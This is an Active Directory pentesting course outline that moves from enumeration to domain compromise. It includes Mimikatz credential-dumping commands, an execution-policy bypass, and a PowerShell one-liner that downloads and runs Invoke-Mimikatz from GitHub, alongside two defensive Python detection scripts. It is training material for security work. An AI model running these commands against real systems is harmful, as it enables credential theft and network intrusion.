Most enterprise networks today are managed using Windows Active Directory, and it is imperative for a security professional to understand the threats to the Windows infrastructure.
Active Directory Pentesting is designed to help security professionals understand, analyze and practice threats and attacks in a modern Active Directory environment. The course is beginner friendly and comes with walkthrough videos and documents listing all the commands executed in the videos. The course is based on our years of experience and research in breaking Windows and AD environments.
When it comes to AD security, there is a large knowledge gap which security professionals and administrators struggle to fill. Over the years, I have taken numerous trainings on AD security around the world and always found that there is a lack of quality material and, especially, a lack of good walkthroughs and explanations.
The course simulates real-world attack and defense scenarios: we start with a non-admin user account in the domain and work our way up to enterprise admin. The focus is on exploiting a variety of overlooked domain features, not just software vulnerabilities.
We cover topics like AD enumeration, tools to use, domain privilege escalation, domain persistence, Kerberos-based attacks (Golden Ticket, Silver Ticket and more), ACL issues, SQL Server trusts, and bypasses of defenses.
Local Escalation and Enumeration
1. Domain Enumeration
2. Local User & Group Enumeration
3. Network Enumeration
4. Antivirus & Detections
5. Hunting Passwords
6. Tools
7. Windows Version and Configuration
winPEAS (winPEAS has Watson embedded)
Github repos of exploits:
https://github.com/nomi-sec/PoC-in-GitHub
https://github.com/abatchy17/WindowsExploits
https://github.com/SecWiki/windows-kernel-exploits
8. Sherlock/Watson
https://github.com/rasta-mouse/Sherlock
https://github.com/rasta-mouse/Watson
PS C:\AD> Import-Module .\Sherlock.ps1
PS C:\AD> Find-AllVulns
9. CVE-2019-1388
10. Scheduled Task Privilege Escalation
11. Unquoted Service Path
12. SeImpersonate
13. Windows - Privilege Escalation and Local Enumeration Cheat Sheet
14. Recommended Windows Hack The Box machines
Recommended Windows Hack The Box machines to Practice Privilege Escalation
Regrettably, the vast majority of HTB Windows machines require kernel exploits for privilege escalation. I found the following machines helpful for practicing priv esc (read: not your typical privilege escalation).
Chatterbox
Jeeves
Access
Active
SecNotes
Lateral Movement
15. User Enumeration
16. Domain Group Enumeration
17. Domain Computer/Servers Enumeration
18. GPO and OU Enumeration
19. Domain Shares Enumeration
20. ACL Enumeration
Good Read:
https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=net-5.0
21. Active Directory Recon
https://github.com/sense-of-security/ADRecon
.\ADRecon.ps1 -OutputType HTML
22. BloodHound - Setting Up BloodHound
Download Bloodhound GUI
https://github.com/BloodHoundAD/BloodHound/releases
Download and install Java
https://www.java.com/en/download/
Download JDK
https://jdk.java.net/archive/
setx -m JAVA_HOME "C:\AD\Bloodhound\jdk-11.0.9"
Download Neo4j
https://neo4j.com/download-center/#community
neo4j.bat install-service
neo4j-admin set-initial-password yourpasswordhere
neo4j.bat start
neo4j.bat stop
Download SharpHound
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
powershell -ep bypass
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Verbose -Domain pentesting
BloodHound Website
https://bloodhound.readthedocs.io/en/latest/index.html
23. BloodHound Basics
24. User Hunting Domain Enumeration - Lateral Movement
25. Domain Enumeration Cheat Sheet - PowerView
Domain Privilege Escalation
26. Before You Start
27. How Kerberos Works
28. Dumping SAM and SYSTEM For Offline Cracking
29. SAM & LSA with Mimikatz
LSA and SAM
https://networkencyclopedia.com/local-security-authority-lsa/
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
https://www.windows-active-directory.com/windows-security-account-manager.html
Dumping NTLM Hashes from SAM using Mimikatz
https://joshdawes.com/dumping-ntlm-hashes-from-sam-using-mimikatz/
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName target1.example.org
#Elevate Privileges to extract the credentials
privilege::debug #This should not give an error if you are an Admin; if it does, check whether SeDebugPrivilege was removed from the Administrators group
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from SAM
lsadump::sam
#One liner
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
https://book.hacktricks.xyz/windows/stealing-credentials#dump-lsa-secrets
30. Pass-the-Hash with Mimikatz
A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor does not need to crack the hash to obtain a plaintext password. PtH attacks exploit the authentication protocol, as the password hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system's active memory and through other techniques.
31. Passing the Ticket
In a pass-the-ticket attack, an attacker extracts a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on one system and then uses it on another system to request Kerberos service tickets (TGS) and gain access to network resources.
One primary difference between pass-the-hash and pass-the-ticket is that Kerberos TGTs expire (10 hours by default), whereas NTLM hashes only change when the user changes their password. So a TGT must be used within its lifetime, or be renewed, which extends its usability for a longer period (7 days by default).
32. Pass the Ticket with Rubeus
33. Session Hijack
34. SMB Relay Attack
#Download Inveigh here:
https://github.com/Kevin-Robertson/InveighZero
35. Bypass AMSI with mimidogz
36. Bypass Anti Virus Run mimikatz
https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
37. 10 ways to get dump files
https://book.hacktricks.xyz/windows/stealing-credentials
Domain Persistence and Dominance
38. Before You Start This Section - Domain Privilege Escalation
39. ACL - GenericAll on Group
More on ACL:
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
40. Priv Esc – DNSAdmins
https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise
41. DCSync
DCSync is a credential dumping technique that can lead to the compromise of individual user credentials and, more seriously, serve as a prelude to the creation of a Golden Ticket, since DCSync can be used to compromise the krbtgt account's password.
To perform a DCSync attack, an adversary must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges. Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from Active Directory.
The KRBTGT account is a local default account that acts as a service account for the Key Distribution Center (KDC) service. It is created automatically when a new domain is created. It cannot be deleted, its name cannot be changed, and it cannot be enabled.
The KDC service handles all Kerberos ticket requests, so the KRBTGT account plays a key role: its key is used to encrypt and sign all Kerberos tickets for the domain.
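Because the replication privileges named above are exercised through a control-access check on the domain object, a domain controller logs Security event ID 4662 for each replication request, which gives defenders a detection hook. The following is an added example, not part of the course material: it flags 4662 records where a principal other than a known domain controller account exercised the DS-Replication-Get-Changes rights. The event dicts, the allow-list KNOWN_DCS and the sample events are constructed assumptions; the GUIDs are the real control-access-right identifiers for those privileges.

```python
# Added example (not part of the course material): flag DCSync-style
# replication requests in Windows Security event ID 4662 records.
# Assumptions: events arrive as dicts with the fields used below, and
# KNOWN_DCS lists the domain controller computer accounts that replicate
# legitimately (a constructed allow-list; derive it from AD in practice).

# Control-access-right GUIDs behind the "Replicating Directory Changes"
# and "Replicating Directory Changes All" privileges named in the text.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
CONTROL_ACCESS = 0x100  # AccessMask bit logged for a control-access check
KNOWN_DCS = {"DC01$", "DC02$"}  # constructed sample allow-list


def replication_rights(event):
    """Names of replication rights present in a 4662 Properties field."""
    props = event.get("Properties", "").lower()
    return tuple(name for guid, name in REPLICATION_GUIDS.items() if guid in props)


def is_dcsync(event):
    """True when a non-DC principal exercised directory replication rights."""
    if event.get("EventID") != 4662:
        return False
    if not int(event.get("AccessMask", "0"), 16) & CONTROL_ACCESS:
        return False
    if not replication_rights(event):
        return False
    return event.get("SubjectUserName", "").upper() not in KNOWN_DCS


def scan(events):
    """Return (account, rights) for every event that looks like DCSync."""
    return [(e["SubjectUserName"], replication_rights(e)) for e in events if is_dcsync(e)]


# Constructed sample events, not real telemetry.
GET_CHANGES = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
GET_CHANGES_ALL = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": f"{GET_CHANGES} {GET_CHANGES_ALL}"},  # normal DC-to-DC replication
    {"EventID": 4662, "SubjectUserName": "jsmith", "AccessMask": "0x100",
     "Properties": f"{GET_CHANGES} {GET_CHANGES_ALL}"},  # user account replicating: suspicious
    {"EventID": 4662, "SubjectUserName": "jsmith", "AccessMask": "0x20",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},  # placeholder GUID, unrelated access
]

if __name__ == "__main__":
    for account, rights in scan(SAMPLE_EVENTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Auditing of 4662 must be enabled for the domain naming context (Directory Service Access) before these events appear at all; accounts on the allow-list should be reviewed as carefully as the alerts.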
42. ZeroLogon CVE-2020-1472
Zerologon, tracked as CVE-2020-1472, is an authentication bypass vulnerability in the Netlogon Remote Protocol (MS-NRPC), a remote procedure call (RPC) interface that Windows uses to authenticate users and computers on domain-based networks. The protocol was designed for specific tasks such as maintaining relationships between domain members and the domain controller (DC), or between multiple domain controllers across one or more domains, and replicating the domain controller database.
43. Unconstrained Delegation - Computer
44. Constrained Delegation - Computer
Kerberos constrained delegation was introduced in Windows Server 2003 to provide a safer form of delegation that could be used by services.
When it is configured, constrained delegation restricts the services to which the specified server can act on behalf of a user.
This requires domain administrator privileges to configure a domain account for a service, and it restricts the account to a single domain.
In today's enterprise, front-end services are not designed to be limited to integration with only services in their domain.
45. ACL - GenericWrite on User
46. SET-SPN - Kerberoast
You need to have GenericAll or GenericWrite to set the SPN
47. Targeted Kerberoasting - AS-REPs - FINDING
The ASREPRoast attack looks for users that do not have the Kerberos pre-authentication required attribute set (DONT_REQ_PREAUTH).
That means that anyone can send an AS_REQ request to the DC on behalf of any of those users and receive an AS_REP message.
This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. By using this message, the user's password can be cracked offline.
Furthermore, no domain account is needed to perform this attack, only a connection to the DC. However, with a domain account, an LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise, usernames have to be guessed.
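The same LDAP query works from the defender's side: the DONT_REQ_PREAUTH flag is a bit in userAccountControl, so an audit can list the exposed accounts before an attacker does. The following is an added example, not part of the course: it builds the bitwise LDAP filter and separates enabled accounts (roastable now) from disabled ones that merely carry the flag. The entry format and SAMPLE_ENTRIES are constructed assumptions; the flag values and the matching-rule OID are the standard ones.

```python
# Added example (not from the course): audit a domain for ASREPRoast
# exposure, i.e. enabled accounts whose userAccountControl has
# DONT_REQ_PREAUTH set. Assumptions: directory entries are dicts with the
# two attributes used below; SAMPLE_ENTRIES is constructed, not real data.

# userAccountControl bit flags (well-known values).
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000
# LDAP_MATCHING_RULE_BIT_AND lets an LDAP filter test a single bit.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def preauth_audit_filter():
    """LDAP filter that asks a DC for all user objects not requiring pre-auth."""
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={DONT_REQ_PREAUTH}))")


def exposed_accounts(entries):
    """Split flagged accounts into (enabled, disabled) sAMAccountName lists.

    Disabled accounts are reported separately: the KDC refuses them, so no
    crackable AS-REP comes back even though the flag is set, but the flag
    should still be cleared before the account is ever re-enabled.
    """
    exposed, disabled = [], []
    for e in entries:
        uac = int(e["userAccountControl"])
        if not uac & DONT_REQ_PREAUTH:
            continue
        (disabled if uac & ACCOUNTDISABLE else exposed).append(e["sAMAccountName"])
    return exposed, disabled


# Constructed sample entries (decimal userAccountControl, as LDAP returns it).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_legacy", "userAccountControl": "4260352"},  # 0x410200: pre-auth off
    {"sAMAccountName": "jsmith", "userAccountControl": "66048"},        # 0x10200: normal user
    {"sAMAccountName": "old_svc", "userAccountControl": "4260354"},     # 0x410202: off, disabled
]

if __name__ == "__main__":
    print("LDAP filter:", preauth_audit_filter())
    exposed, disabled = exposed_accounts(SAMPLE_ENTRIES)
    print("roastable now:", exposed)
    print("flag set but account disabled:", disabled)
```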
48. Targeted Kerberoasting - AS-REPs - SET